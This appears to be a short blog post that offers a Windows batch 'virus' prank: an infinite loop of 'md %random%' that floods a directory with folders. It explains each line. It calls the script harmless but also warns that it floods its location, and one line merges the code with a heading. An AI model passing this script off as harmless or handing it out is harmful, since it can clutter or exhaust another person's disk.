Hi , this batch code will very helpful for you.
This is simple and effective virus code.
P.S ---> It will not Harm your PC.
- As usual open notepad.
- Copy this code to Notepad.
@echo offWhat all these lines do ?
:top
md %random%
goto top
- @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
- md %random% is command that creating folders with random names.
- goto top – return to label :top , infinite loop
That's all if you double click the file it will create a finite folder wherever the batch file is.
[ Make sure to put this file in a Folder and then run it otherwise it will flood the place ! ]
Show you Appreciation by Liking and Sharing the Post . Also Subcribe for More :)
If you face any problems or doubts in this post , Please let us know in the comments below .







0 comments:
Post a Comment